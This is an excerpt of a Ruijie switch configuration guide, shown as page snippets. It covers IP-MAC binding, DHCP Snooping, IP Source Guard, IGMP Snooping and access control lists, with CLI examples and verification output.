  • Page 835 Configuration Guide Configuring Global IP-MAC Binding IP Network is an external IP network. Deployment  Manually configure the global IP-MAC binding. (Take three users as an example.) User MAC Address IP Address User 1 00d0.3232.0001 192.168.1.10 User 2 00d0.3232.0002 192.168.1.20 User 3 00d0.3232.0003 192.168.1.30...
  • Page 836 Configuration Guide Configuring Global IP-MAC Binding By default, the IP-MAC binding function takes effect on all ports of the device. You can configure exclude ports so that the address binding function does not take effect on these ports. In practice, the IP-MAC bindings of the input packets on the uplink port are not fixed.
  • Page 837 Configuration Guide Configuring Global IP-MAC Binding 7.3.3 Configuring the Exclude Port Working Principle Configure an exclude port so that the address binding function does not take effect on this port. Related Configuration  Configuring the Exclude Port Run the address-bind uplink command to configure an exclude port. By default, no port is the exclude port. 7.4 Configuration Configuration Description and Command...
  • Page 838  Steps Enable the address binding function. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Verification Display the global IP-MAC binding on the device. Ruijie#show address-bind Total Bind Addresses in System : 1...
  • Page 839 Configuration  Steps Enable the address binding function.  Set the IPv6 address binding mode to Compatible. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z. Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Ruijie(config)# address-bind ipv6-mode compatible...
  • Page 840 Configuration Usage Configuration Example  Configuring the Exclude Port  Configuration Create a global IPv4-MAC binding.  Steps Enable the address binding function.  Configure an exclude port. Ruijie# configure terminal Enter configuration commands, one per line. End with CNTL/Z.
  • Page 841 Configuration Guide Configuring Global IP-MAC Binding Ruijie(config)# address-bind 192.168.5.1 00d0.f800.0001 Ruijie(config)# address-bind install Ruijie(config)# address-bind uplink GigabitEthernet 0/1 Verification Display the global IP-MAC binding on the device. Ruijie#show address-bind Total Bind Addresses in System : 1 IP Address Binding MAC Addr...

  • Page 842: Scenario

    Configuration Guide Configuring DHCP Snooping 8 Configuring DHCP Snooping 8.1 Overview DHCP Snooping: DHCP Snooping snoops DHCP interactive packets between clients and servers to record and monitor users' IP addresses and filter out illegal DHCP packets, including client request packets and server response packets. The legal user database generated from DHCP Snooping records may serve security applications like IP Source Guard.

  • Page 843: Scenario

    Configuration Guide Configuring DHCP Snooping Figure 8-1 Remarks: S is an access device. A is a user PC. B is a DHCP server within the controlled area. C is a DHCP server out of the controlled area. Deployment  Enable DHCP Snooping on S to realize DHCP packet monitoring. ...

  • Page 844: Scenario

    Configuration Guide Configuring DHCP Snooping  Limit the rates of DHCP packets from the untrusted ports.  Enable DHCP Snooping correlation with ARP, and detect whether the user is online. 8.2.3 Guarding Against Forged DHCP Packets Scenario Potential malicious clients in a network may forge DHCP request packets, consuming applicable IP addresses from the servers and probably preempting legal users' IP addresses.

  • Page 845: Scenario

    Configuration Guide Configuring DHCP Snooping 8.2.4 Guarding Against IP/MAC Spoofing Scenario Check IP packets from untrusted ports to filter out forged IP packets based on IP or IP-MAC fields. For example, in the following figure, the IP packets sent by DHCP clients are validated. ...

  • Page 846: Scenario

    Configuration Guide Configuring DHCP Snooping Deployment  The same as that in the section "Guarding Against IP/MAC Spoofing". 8.2.6 Detecting ARP Attacks Scenario Check the ARP packets from untrusted ports and filter out the ARP packets unmatched with the assignments of the DHCP server.
  • Page 847 Configuration Guide Configuring DHCP Snooping 8.3 Features Basic Concepts  DHCP Request Packets Request packets are sent from a DHCP client to a DHCP server, including DHCP-DISCOVER packets, DHCP-REQUEST packets, DHCP-DECLINE packets, DHCP-RELEASE packets and DHCP-INFORM packets.  DHCP Response Packets Response packets are sent from a DHCP server to a DHCP client, including DHCP-OFFER packets, DHCP-ACK packets and DHCP-NAK packets.
  • Page 848 Configuration Guide Configuring DHCP Snooping Snooping binding database. Combined with ARP detection and ARP check, DHCP Snooping controls the reliable assignment of IP addresses for legal clients.  DHCP Snooping Rate Limit DHCP Snooping rate limit function can be configured through the rate limit command of Network Foundation Protection Policy (NFPP).
  • Page 849 Configuration Guide Configuring DHCP Snooping Working Principle During snooping, check the receiving ports and the packet fields of packets to realize packet filtering, and modify the destination ports of packets to realize control of transmit range of the packets.  Checking Ports In receipt of DHCP packets, a client first judges whether the packet receiving ports are DHCP Snooping trusted ports.
  • Page 850 Configuration Guide Configuring DHCP Snooping Working Principle During snooping, the binding database is updated timely based on the types of DHCP packets.  Generating Binding Entries When a DHCP-ACK packet on a trusted port is snooped, the client's IP address, MAC address, and lease time field are extracted together with the port ID (an wired interface index or a WLAN ID)and VLAN ID.
  • Page 851 Configuration Guide Configuring DHCP Snooping ip dhcp snooping information option Configures the sub-potion remote-id of format remote-id Option82 as a user-defined character string. ip dhcp snooping vlan information option Configures the sub-option circuit-id of format-type circuit-id string Option82 as a user-defined character string. 8.4.1 Configuring Basic Features Configuration Effect ...
  • Page 852 Configuration Guide Configuring DHCP Snooping  Enable this feature to timely save the DHCP Snooping binding database information in case that client reboot.  Unless otherwise noted, the feature should be configured on access devices.  Enabling BOOTP Support  Optional ...
  • Page 853 Configuration Guide Configuring DHCP Snooping Description Command Interface configuration mode/WLAN security configuration mode Mode Use this command to reject all DHCP request packets at the port, that is to forbid all users under the port to Usage Guide apply for addresses via DHCP. ...
  • Page 854 Configuration Guide Configuring DHCP Snooping Mode Usage Guide Use this command to import the information from Flash documents to the DHCP Snooping binding database.  Configuring DHCP Snooping Trusted Ports Command [ no ] ip dhcp snooping trust Parameter Description Command Interface configuration mode Mode...

  • Page 855: Scenario

    Configuration Guide Configuring DHCP Snooping Scenario Figure 8-5  Configuration Enable DHCP Snooping on an access device (Switch B in this case).  Steps Configure the uplink port (port Gi 0/1 in this case) as a trusted port. B#configure terminal Enter configuration commands, one per line.
  • Page 856 Configuration Guide Configuring DHCP Snooping Total number of bindings: 1 MacAddress IpAddress Lease(sec) Type VLAN Interface ------------------ --------------- ------------ ------------- ----- -------------------- 0013.2049.9014 172.16.1.2 86207 dhcp-snooping 1 GigabitEthernet 0/11 Common Errors  The uplink port is not configured as a DHCP trusted port. ...
  • Page 857  Configuration Configuring basic functions of DHCP Snooping.  Steps Configuring Option82. Ruijie# configure terminal Ruijie(config)# ip dhcp snooping information option Ruijie(config)# end Verification Check the DHCP Snooping configuration. B#show ip dhcp snooping Switch DHCP Snooping status ENABLE DHCP Snooping Verification of hwaddr status...
  • Page 858 Configuration Guide Configuring DHCP Snooping 8.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description Command Clears the DHCP Snooping binding clear ip dhcp snooping binding [ ip ] [ mac ] [ vlan vlan-id ] [ interface interface-id database.

  • Page 859: Scenario

    Configuration Guide Configuring IP Source Guard 9 Configuring IP Source Guard 9.1 Overview The IP Source Guard function realizes hardware-based IP packet filtering to ensure that only the users having their information in the binding database can access networks normally, preventing users from forging IP packets. 9.2 Applications Application Description...
  • Page 860 Configuration Guide Configuring IP Source Guard  Enable DHCP Snooping on S to realize DHCP monitoring.  Set all downlink ports on S as DHCP untrusted ports.  Enable IP Source Guard on S to realize IP packet filtering.  Enable IP–MAC match mode for IP Source Guard on S, filtering IP packets based on IP and MAC addresses.
  • Page 861 It can be enabled using the ip verify source command. Usually IP Source Guard needs to work with DHCP Snooping. Therefore, DHCP Snooping should also be enabled. DHCP Snooping can be enabled at any time on Ruijie devices, either before or after IP Source Guard is enabled. ...
  • Page 862 Configuration Guide Configuring IP Source Guard The above-mentioned port can be a wired switching port, a layer-2 AP port or a layer-2 encapsulation sub-interface, or a WLAN interface. 9.4 Configuration Configuration Description and Command (Mandatory) It is used to enable IP Source Guard. ip verify source Enables IP Source Guard on a port.
  • Page 863 Enabling IP Source Guard on Port 1  Configuration Enable DHCP Snooping.  Steps Enable IP Source Guard. Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip verify source Ruijie(config-if-GigabitEthernet 0/1)# end Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# ip verify source port-security Ruijie(config-wlansec)# end...
  • Page 864 Enable IP Source Guard. Steps  Configure a static binding. Ruijie# configure terminal Ruijie(config)# ip source binding 00d0.f801.0101 vlan 1 192.168.4.243 interface GigabitEthernet 0/3 Ruijie(config)# end Verification Displays the address filtering table of IP Source Guard. Ruijie# show ip verify source...
  • Page 865 Enable DHCP Snooping.  Steps Enable IP Source Guard. Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# ip verify source Ruijie(config-if-GigabitEthernet 0/1)# ip verify source exclude-vlan 1 Ruijie(config-if)# end Ruijie(config)# wlansec 1 Ruijie(config-wlansec)# ip verify source Ruijie(config-wlansec)# ip verify source exclude-vlan 1 Ruijie(config-wlansec)# end Display the configuration of excluded VLANs specified on a port.
  • Page 866 Configuration Guide Configuring IGMP Snooping 10 Configuring IGMP Snooping 10.1 Overview Internet Group Management Protocol (IGMP) snooping is a mechanism of listening to IP multicast. It is used to manage and control the forwarding of IP multicast traffic within VLANs, realizing Layer-2 multicasting. As shown in the following figure, when a Layer-2 device is not running IGMP snooping, IP multicast packets are broadcast within the VLAN;...

  • Page 867: Scenario

    Configuration Guide Configuring IGMP Snooping Protocols and Standards  RFC4541: Considerations for Internet Group Management Protocol (IGMP) and Multicast Listener Discovery (MLD) Snooping Switches 10.2 Applications Application Description Layer-2 Multicast Control Enables precise forwarding of Layer-2 multicast packets to avoid flooding at this layer. Conversion from Multicast to Unicast Realizes conversion from multicast to unicast between AP to STA.

  • Page 868: Scenario

    Configuration Guide Configuring IGMP Snooping Deployment Configure basic IGMP snooping functions. 10.2.2 Multicast-to-Unicast Conversion Scenario When multicast-to-unicast conversion is not configured, packets are transmitted from the AP to STAs in multicast mode. There is no acknowledgement and retransmission mechanism for multicast packets in wireless networks. As a result, severe packet loss occurs, which affect experience of wireless multicast services in video on demand and other applications.

  • Page 869: Scenario

    Configuration Guide Configuring IGMP Snooping Deployment Configure the multicast-to-unicast conversion function. The function is available only in wireless multicast scenarios. 10.3 Features Basic Concepts  Multicast Router Ports and Member Ports IGMP snooping is VLAN-based. The ports involved refer to the member ports within the VLAN. The device running IGMP snooping identifies the ports within the VLAN as a multicast router port or member port so as to manage and control the forwarding of IP multicast traffic within the VLAN.
  • Page 870 Configuration Guide Configuring IGMP Snooping can automatically detect the multicast router port and maintain the port dynamically. It also allows users to configure a static router port.  Member port: The port is on a Layer-2 multicast device and is connected to member hosts. It directs the profile members.
  • Page 871 Configuration Guide Configuring IGMP Snooping Ruijie# show ip igmp snooping gda-table Multicast Switching Cache Table D: DYNAMIC //Dynamic member port S: STATIC //Static member port M: MROUTE //Multicast router port (dynamic or static) (*, 233.3.6.29, 1): //(S: any; G: 233.3.6.29; VLAN_ID: VLAN 1)
  • Page 872 For the IGMPv3 Report packets, Ruijie products handle only the profile information but not the source information. When the device running IGMP snooping receives the Report packets, it performs the following operations within the VLAN: ...
  • Page 873 Configuration Guide Configuring IGMP Snooping  Leave Packets If a host requests to leave a profile, it will send a Leave packet. When the device running IGMP snooping receives the Leave packets, it performs the following operations within the VLAN: ...
  • Page 874 Configuration Guide Configuring IGMP Snooping  Configuring the Aging Time of a Dynamic Router Port The default aging time is 300s. When a dynamic router port receives a query packet, the aging timer of the port is enabled or reset; if the aging time is not configured, the maximum response time carried by the query packet is used as the aging time.
  • Page 875 Configuration Guide Configuring IGMP Snooping 10.3.3 IGMP Querier On a network with a Layer-3 multicast device, the Layer-3 multicast device acts as an IGMP querier. In this case, a Layer-2 device needs only to listen to IGMP packets to establish and maintain the forwarding entry, realizing Layer-2 multicast. On a network without a Layer-3 multicast device, the Layer-2 multicast device must be configured with the IGMP querier function so that the device can listen to IGMP packets.
  • Page 876 Configuration Guide Configuring IGMP Snooping Related Configuration  Enabling the Querier Function By default, the querier function of a device is disabled. Run the ip igmp snooping querier command to enable the global querier function. Run the ip igmp snooping vlan num querier command to enable the querier function for specific VLANs. ...

  • Page 877: Scenario

    Configuration Guide Configuring IGMP Snooping 10.3.4 Multicast-to-Unicast Conversion The multicast-to-unicast conversion function is available only in wireless environment. After the function is configured on a wireless device, multicast packets between an AP and STAs are transmitted in unicast mode. The multicast-to-unicast conversion function runs on the AP.

  • Page 878: Scenario

    Configuration Guide Configuring IGMP Snooping  Configuring the Multicast Range for Multicast-to-Unicast Conversion By default, multicast-to-unicast conversion is available to all multicast profiles. Use AC as an example. In ap-config mode, run the igmp snooping mcast-to-unicast group-range command to configure the profile address range for multicast-to-unicast conversion.
  • Page 879 Configuration Guide Configuring IGMP Snooping Mode) Enables globally IGMP Snooping. ip igmp snooping Enables multicast on AP in the ap-config ip igmp snooping of AC. no ip igmp snooping vlan num Disables IGMP snooping for a VLAN. (Optional) It is used to adjust relevant configurations for processing protocol packets. ip igmp snooping vlan vlan-id mrouter Configures a static router port.
  • Page 880 Configuration Guide Configuring IGMP Snooping Configures the maximum response time igmp snooping vlan querier max-response-time num of query packets for a VLAN. Configures the aging timer for queriers ip igmp snooping querier timer expiry num globally. ip igmp snooping vlan num querier timer Configures the aging timer for a querier of a VLAN.
  • Page 881 Configuration Guide Configuring IGMP Snooping Configuration Steps  Enabling Global IGMP Snooping Mandatory. After global multicast configuration is enabled, enable IGMP Snooping. In this way, IGMP Snooping take effects.  Disabling IGMP Snooping for a VLAN (Optional) You can use this function if you wish to disable IGMP snooping on specified VLANs. Only when global IGMP snooping is enabled can it be disabled on specified VLANs.

  • Page 882: Scenario

    Configuration Guide Configuring IGMP Snooping Command show ip igmp snooping gda-table Parameter Description Privileged EXEC mode, global configuration mode, or interface configuration mode Command Mode This command is used to verify that the ports include only those connecting member hosts. Usage Guide ...
  • Page 883 Configuration Guide Configuring IGMP Snooping A# configure terminal A(config)# ip multicast-routing A(config)# interface GigabitEthernet 0/1 A(config-if-GigabitEthernet 0/1)# ip pim sparse-mode A(config-if-GigabitEthernet 0/1)# exit A(config)# interface vlan 1 A(config-if-VLAN 1)# ip pim sparse-mode A(config-if-VLAN 1)# exit B# configure terminal B(config)# ip igmp snooping ivgl Send packets from the source (10.1.1.1) to G (229.1.1.1) to add Receiver 1 to G.
  • Page 884 Configuration Guide Configuring IGMP Snooping ------------- IGMP Snooping state: Enable Multicast router learning mode: pim-dvmrp IGMP Fast-Leave: Disabled IGMP VLAN querier: Disable IGMP VLAN Mode: STATIC Common Errors  The working mode of IGMP snooping is improper. 10.4.2 Configuring the Packet Processing Configuration Effect ...
  • Page 885 Configuration Guide Configuring IGMP Snooping  When there are numerous receivers to receive the packets from the same multicast profile, you can enable Report packets suppression to suppress the number of Report packets to be sent.  Enabling the Immediate-Leave Function ...
  • Page 886 Configuration Guide Configuring IGMP Snooping Command Global configuration mode Mode In SVGL mode, if a sub VLAN is not configured, only the configurations for the static router port within the Usage Guide shared VLAN can take effect, and the others can be configured but cannot take effect. If a sub VLAN is configured, only the configurations for the static router port within the shared VLAN or a non-sub VLAN can take effect, and the others can be configured but cannot take effect.

  • Page 887: Scenario

    Configuration Guide Configuring IGMP Snooping receives a leave packet. After that, the packets will no longer be forwarded to this port when it receives the query packets of specified profiles. Leave packets include the IGMPv2 Leave packets as well as the IGMPv3 Report packets that include types but carry no source address.
  • Page 888 Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If the router port is successfully configured, an "S" will be displayed in the port information. Ruijie(config)#show ip igmp snooping mrouter Multicast Switching Mroute Port D: DYNAMIC S: STATIC...
  • Page 889 Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If the member port is successfully configured, an "S" will be displayed in the port information. Ruijie(config)#show ip igmp snooping gda-table Multicast Switching Cache Table D: DYNAMIC S: STATIC M: MROUTE (*, 224.1.1.1, 1):...

  • Page 890: Scenario

    Configure a static router port and static member port. Ruijie# configure terminal Ruijie(config)# ip igmp snooping vlan 1 mrouter interface GigabitEthernet 0/0 Ruijie(config)# ip igmp snooping vlan 1 static 224.1.1.1 interface GigabitEthernet 0/0 Ruijie(config)# end Verification Run the show ip igmp snooping mrouter and show ip igmp snooping gda-table commands to check whether the configuration takes effect.
  • Page 891 Configuration Guide Configuring IGMP Snooping A is the multicast router and is connected directly to multicast Source 1. B is a Layer-2 device and is connected directly to the user host and multicast Source 2. Receiver 1, Receiver 2, and Receiver 3 are connected to VLAN 1. ...
  • Page 892 Configure the response time of a Query packet. Ruijie# configure terminal Ruijie(config)# ip igmp snooping fast-leave enable Ruijie(config)# no ip igmp snooping mrouter learn pim-dvmrp Ruijie(config)#ip igmp snooping dyn-mr-aging-time 200 Ruijie(config)#ip igmp snooping host-aging-time 100 Ruijie(config)#ip igmp snooping query-max-response-time 60 Ruijie(config)# end Run the show ip igmp snooping command to check whether the configuration is successful.
  • Page 893 Configuration Guide Configuring IGMP Snooping Configuration Steps  Enabling the Querier Function  (Optional) Enable IGMP querier function globally or for a specified VLAN.  (Optional) Disable the IGMP querier function for a specified VLAN.  Configuring the Source IP Address of a Querier ...
  • Page 894 Configuration Guide Configuring IGMP Snooping Parameter vlan vid: Specifies a VLAN. This configuration applies to all VLANs by default. Description a.b.c.d: Indicates the source IP address. Global configuration mode Command Mode After a querier is enabled, a source IP address must be specified for the querier; otherwise, the configuration Usage Guide will not take effect.
  • Page 895 Description Command Privileged EXEC mode, global configuration mode, or interface configuration mode Mode Usage Guide If QinQ is enabled, the following content is displayed. Ruijie(config)#show ip igmp snooping querier detail Vlan IP Address IGMP Version Port ----------------------------------------------------------- Global IGMP switch querier status...

  • Page 896: Scenario

    Configuration Guide Configuring IGMP Snooping Scenario Figure 10-9 In the scenario without Layer-3 multicast equipment, the multicast traffic can be forwarded only on the Layer-2 network. A acts as a Layer-2 device to connect to the multicast source and receiver. ...
  • Page 897 Configuration Guide Configuring IGMP Snooping max-response-time (sec) : 10 querier-timeout (sec) : 125 operational state : Querier operational version Common Errors  The source IP address is not configured for the querier and the querier does not take effect. 10.4.4 Configuring Multicast-to-Unicast Conversion Configuration Effect ...
  • Page 898 Configuration Guide Configuring IGMP Snooping Related Commands  Configuring Global Multicast Command ip multicast wlan Parameter Description Global configuration mode Command Mode Usage Guide If global multicast is enabled, multicast packets are processed only after they reach the AC. If global multicast is disabled, the AC directly discards the received multicast packets.

  • Page 899: Scenario

    Privileged EXEC mode, global configuration mode, and interface configuration mode Command Mode If multicast-to-unicast conversion is configured successfully, the following information is displayed: Usage Guide Ruijie(config)#sh ip igmp snooping WLAN Multicast: Enable IGMP Snooping running mode: IVGL IGMP Snooping M2U-Forward: Enable IGMP Snooping Support M2U Max-Group Num: 64 IGMP Snooping M2U Group range: 233.3.3.1-233.3.3.64...
  • Page 900 Configuration Guide Configuring IGMP Snooping Configuration  Enable IGMP Snooping on the AC. Steps  Enable global multicast on the AC.  Enable IGMP Snooping in ap-config mode.  Enable multicast-to-unicast conversion in ap-config mode.  Configure the maximum multicast range for multicast-to-unicast conversion in ap-config mode. ...
  • Page 901 Configuration Guide Configuring IGMP Snooping 10.4.5 Optimizing the Wireless Multicast Environment Configuration Effect  Configure the function of ignoring port timer resetting for query packets on the wireless device. Notes  IGMP Snooping basic functions must be configured. Configuration Steps ...
  • Page 902 Configuration Guide Configuring IGMP Snooping Displays the router ports. show ip igmp snooping mrouter Displays the IGMP snooping entries. show ip igmp snooping gda-table Displays the IGMP querier. show ip igmp snooping querier [ detail ] Displaying the user’s information Show ip igmp snooping user-info Debugging System resources are occupied when debugging information is output.

  • Page 903: Scenario

    Configuration Guide Configuring ACL 11 Configuring ACL 11.1 Overview Access Control List (ACL) is also called access list or firewall. It is even called packet filtering in some documents. The ACL defines rules to determine whether to forward or drop data packets arriving at a network interface.
  • Page 904 Configuration Guide Configuring ACL Remarks Switch C at the access layer:It is connected to PCs of each department and to Switch B at the aggregation layer through the gigabit optical fiber (trunk mode). Switch B at the aggregation layer:Multiple virtual local area networks (VLANs) are divided. One VLAN is defined for one department.
  • Page 905 Configuration Guide Configuring ACL 11.3 Features Basic Concepts  ACLs include basic ACLs and dynamic ACLs. You can select basic or dynamic ACLs as required. Generally, basic ACLs can meet the security requirements. However, experienced hackers may use certain software to access the network by means of IP address spoofing.
  • Page 906 Configuration Guide Configuring ACL  Source IP address field (All source IP address values can be specified, or the subnet can be used to define a type of data flows.)  Destination IP address field (All destination IP address values can be specified, or the subnet can be used to define a type of data flows.) ...

  • Page 907: Scenario

    Configuration Guide Configuring ACL of L2 and L4 fields, or a combination of L2, L3, and L4 fields. To use a combination of L2,L3, and L4 fields, you can use the expert ACLs. An SVI associated with ACLs in the outgoing direction supports the IP standard, IP extended, MAC extended, and expert ACLs.
  • Page 908 Configuration Guide Configuring ACL SVI Router ACL Enable users in the same VLAN to communicate with each other. 11.3.1 IP ACL The IP ACL implements refined control on incoming and outgoing IPv4 packets of a device. You can permit or deny the entry of specific IPv4 packets to a network according to actual requirements to control access of IP users to network resources.
  • Page 909 Configuration Guide Configuring ACL For example: access-list 1 permit host 192.168.4.12 This ACL permits only packets sent from the source host 192.168.4.12, and denies packets sent from all other hosts. This is because the following statement exists at the end of this ACL: access-list 1 deny any. If the ACL contains only the following statement: access-list 1 deny host 192.168.4.12 Packets sent from any host will be denied when passing through this port.
  • Page 910 Configuration Guide Configuring ACL  No matter whether the standard IP ACL is a named or number ACL, you can run the following command in standard IP ACL mode to add an ACE: [ sn ] { permit | deny } {hostsource| any | sourcesource-wildcard } [ time-rangetime-range-name ] ...
  • Page 911 Configuration Guide Configuring ACL Protocol ID Range MAC extended ACL 700–799 Typical rules defined in an MAC extended ACL include:  Source MAC address  Destination MAC address  Ethernet protocol type The MAC extended ACL (ID range: 700–799) is used to filter packets based on the source or destination MAC address and the Ethernet type in the packets.
  • Page 912 Configuration Guide Configuring ACL  No matter whether the MAC extended ACL is a named or numbered ACL, you can run the following command in MAC extended ACL mode to add an ACE: [sn] { permit | deny } {any | host src-mac-addr }{any | host dst-mac-addr } [ethernet-type] [coscos ] [innercos] [ time-rangetm-rng-name ] ...
  • Page 913 Configuration Guide Configuring ACL For an individual expert extended ACL, multiple independent statements can be used to define multiple rules. All statements reference the same ID or name so that these statements are bound with the same ACL. If rules in an expert extended ACL are not defined specifically for IPv6 packets, that is, the Ethernet type is not specified or the value of the Ethernet type field is not 0x86dd, the expert extended ACL does not filter IPv6 packets.
  • Page 914 Configuration Guide Configuring ACL  Applying an Expert Extended ACL By default, the expert extended ACL is not applied to any interface, that is, the created expert extended ACL does not filter incoming or outgoing L2 or L3 packets of a device. Run the expert access-group { acl-id | acl-name } { in| out } command in interface configuration mode to apply an expert extended ACL to a specified interface.

  • Page 915: Scenario

    Configuration Guide Configuring ACL For example: ipv6 access-list ipv6_acl 10 permit ipv6 any any 20 deny ipv6 host 200::1 any As the first rule statement permits all IPv6 packets, all IPv6 packets sent from the host 200::1 does not match the subsequent deny rule with the serial number of 20, and therefore will not be denied.
  • Page 916 Configuration Guide Configuring ACL a switch without undergoing the access control, such as port security, Web authentication, 802.1x, and IP+MAC binding check. A globally applied security channel takes effect on all interfaces except exclusive interfaces. The deny ACEs in an ACL that is applied to a security channel do not take effect. In addition, this ACL does not contain an implicit "deny all traffic"...
  • Page 917 Configuration Guide Configuring ACL 11.3.6 SVI Router ACL By default, an ACL that is applied to an SVI also takes effect on L2 packets forwarded within a VLAN and L3 packets forwarded between VLANs. Consequently, users in the same VLAN may fail to communicate with each other. Therefore, a switchover method is provided so that the ACL that is applied to an SVI takes effect only on routing packets between VLANs.
  • Page 918 Configuration Guide Configuring ACL deny host host dscp Adds a deny ACE to an extended IP ACL. precedence fragment time-range Applies a standard or an extended IP ACL. ip access-group in out Configuring (Optional) It is used to filter L2 packets. Extended ACL mac access-list extended Configures an MAC extended ACL.
  • Page 919 Configuration Guide Configuring ACL Configuring a Global Security (Optional) It is used to make an ACL take effect globally. Applies a global security ACL in global ip access-group in out configuration mode. Configures an interface as the exclusive interface of the global security ACL in no global ip access-group interface configuration mode.
  • Page 920 Configuration Guide Configuring ACL  You can configure this ACL on an access, an aggregate, or a core device based on the distribution of users. The IP ACL takes effect only on the local device, and does not affect other devices on the network. ...
  • Page 921 Configuration Guide Configuring ACL  Add ACEs to a standard IP ACL.  Use either of the following methods to add ACEs to a standard IP ACL: Command [ sn ] { permit | deny } {host source | any | source source-wildcard } [ time-range time-range-name ] Parameter sn: Indicates the sequence number of an ACE.
  • Page 922 Configuration Guide Configuring ACL  Add ACEs to an extended IP ACL.  Use either of the following methods to add ACEs to an extended IP ACL: Command [ sn ] { permit | deny } protocol {host source | any | source source-wildcard } {host destination | any | destination destination-wildcard } [ [ precedence precedence [ tos tos ] ] | dscp dscp] [ fragment ] [ time-range time-range-name ] Parameter...
  • Page 923 Configuration Guide Configuring ACL any | destination destination-wildcard } [ [ precedence precedence [ tos tos ] ] | dscp dscp] [ fragment ] [ time-range time-range-name ] Parameter acl-id: Indicates the ID of a numbered ACL. It uniquely identifies an ACL. The value range of acl-id is Description 100–199 and 2000–1999.

  • Page 924: Scenario

    Configuration Guide Configuring ACL  in: Indicates that this ACL controls incoming IP packets of the interface. out: Indicates that this ACL controls outgoing IP packets of the interface. reflect: Indicates that the reflexive ACL is enabled. Command Interface configuration mode Mode Usage Guide This command makes an IP ACL take effect on the incoming or outgoing packets of a specified interface.
  • Page 925 Configuration Guide Configuring ACL ip access-list standard 1 10 permit 10.1.1.0 0.0.0.255 20 deny 11.1.1.0 0.0.0.255 sw1(config)#show access-group ip access-group 1 out Applied On interface GigabitEthernet 0/3 11.4.2 Configuring an MAC Extended ACL Configuration Effect Configure and apply an MAC extended ACL to an interface to control all incoming and outgoing IPv4 packets of this interface. You can permit or deny the entry of specific L2 packets to a network to control access of users to network resources based on L2 packets.
  • Page 926 Configuration Guide Configuring ACL  If an MAC extended ACL is configured to permit or deny some IP packets, run the ping command to check whether ACEs of this ACL takes effect on the specified interface. For example, an MAC extended ACL is configured to prevent a device interface from receiving IP packets (Ethernet type is 0x0800), run the ping command for verification.
  • Page 927 Configuration Guide Configuring ACL deny: Indicates that the ACE is a deny ACE. any: Indicates that L2 packets sent from any host are filtered. host src-mac-addr: Indicates that IP packets sent from a host with the specified source MAC address are filtered.

  • Page 928: Scenario

    Configuration Guide Configuring ACL Parameter acl-id: Indicates that a numbered MAC extended IP ACL will be applied to the interface. Description acl-name: Indicates that a named MAC extended IP ACL will be applied to the interface. in: Indicates that this ACL controls incoming L2 packets of the interface. out: Indicates that this ACL controls outgoing L2 packets of the interface.
  • Page 929 Configuration Guide Configuring ACL  Verification On a visitor's PC, ping the financial data server. Verify that the ping operation fails.  On a visitor's PC, ping the public resource server. Verify that the ping operation succeeds.  On a visitor's PC, access the Internet, for example, visit the Baidu website. Verify that the webpage can be opened.
  • Page 930 Configuration Guide Configuring ACL  Use the following methods to verify the configuration effects of the expert extended ACL:  If IP-based access rules are configured in an expert extended ACL to permit or deny some IP packets, run the ping command to verify whether these rules take effect.
  • Page 931 Configuration Guide Configuring ACL deny: Indicates that the ACE is a deny ACE. protocol: Indicates the IP protocol number. The value ranges from 0 to 255. To facilitate the use, the system provides frequently-used abbreviations to replace the specific IP protocol numbers, including eigrp, gre, icmp, igmp, ip, ipinip, nos, ospf, tcp, and udp.
  • Page 932 Configuration Guide Configuring ACL Parameter acl-id: Indicates the ID of a numbered ACL. It uniquely identifies an ACL. The value range of acl-id is Description 2700-2899. permit: Indicates that the ACE is a permit ACE. deny: Indicates that the ACE is a deny ACE. protocol: Indicates the IP protocol number.

  • Page 933: Scenario

    Configuration Guide Configuring ACL Parameter  acl-id: Indicates that a numbered expert extended ACL will be applied to the interface. Description  acl-name: Indicates that a named expert extended ACL will be applied to the interface.  in: Indicates that this ACL controls incoming L2 packets of the interface. out: Indicates that this ACL controls outgoing L2 packets of the interface.
  • Page 934 Configuration Guide Configuring ACL sw1(config-exp-nacl)#pemit any any any any sw1(config-exp-nacl)#exit sw1(config)#int gigabitEthernet 0/2 sw1(config-if-GigabitEthernet 0/2)#expert access-group 2700 in  Verification On a visitor's PC, ping the financial data server. Verify that the ping operation fails.  On a visitor's PC, ping the public resource server. Verify that the ping operation succeeds. ...
  • Page 935 Configuration Guide Configuring ACL  You can apply an IPv6 ACL on a specified interface of an access, an aggregate, or a core device based on the distribution of users. Verification  Use the following methods to verify the configuration effects of the IPv6 ACL: ...
  • Page 936 Configuration Guide Configuring ACL numbers, including icmp, ipv6, tcp, and udp. src-ipv6-prefix/prefix-len: Indicates that IP packets sent from hosts in the specified IPv6 network segment are filtered. host src-ipv6-addr: Indicates that IPv6 packets sent from a host with the specified source IP address are filtered.
  • Page 937 Configuration Guide Configuring ACL numbers, including icmp, ipv6, tcp, and udp. src-ipv6-prefix/prefix-len: Indicates that IP packets sent from hosts in the specified IPv6 network segment are filtered. host src-ipv6-addr: Indicates that IPv6 packets sent from a host with the specified source IP address are filtered.

  • Page 938: Scenario

    Configuration Guide Configuring ACL Scenario Figure 11-6  Configuration Configure an IPv6 ACL.  Steps Add an ACE to the IPv6 ACL to prevent access to the video server.  Add an ACE to the IPv6 ACL to permit all IPv6 packets. ...
  • Page 939 Configuration Guide Configuring ACL interface of a user, but the user should be allowed to log in to a website to download some resources (for example, downloading the Ruijie SU client) before the DOT1X authentication. Configuration Steps  Configuring an ACL ...
  • Page 940 Configuration Guide Configuring ACL For details about how to add ACEs to an ACL, see the earlier descriptions about the IP ACL, MAC extended ACL, expert extended ACL, or IPv6 ACL.  Configuring a Security Channel on an Interface Command security access-group {acl-id | acl-name } Parameter ...

  • Page 941: Scenario

    Configuration Guide Configuring ACL Scenario Figure 11-7  Configuration Configure an expert extended ACL "exp_ext_esc".  Steps Add an ACE to allow forwarding packets to the destination host 10.1.1.2.  Add an ACE to permit the DHCP packets.  Add an ACE to permit the ARP packets. ...
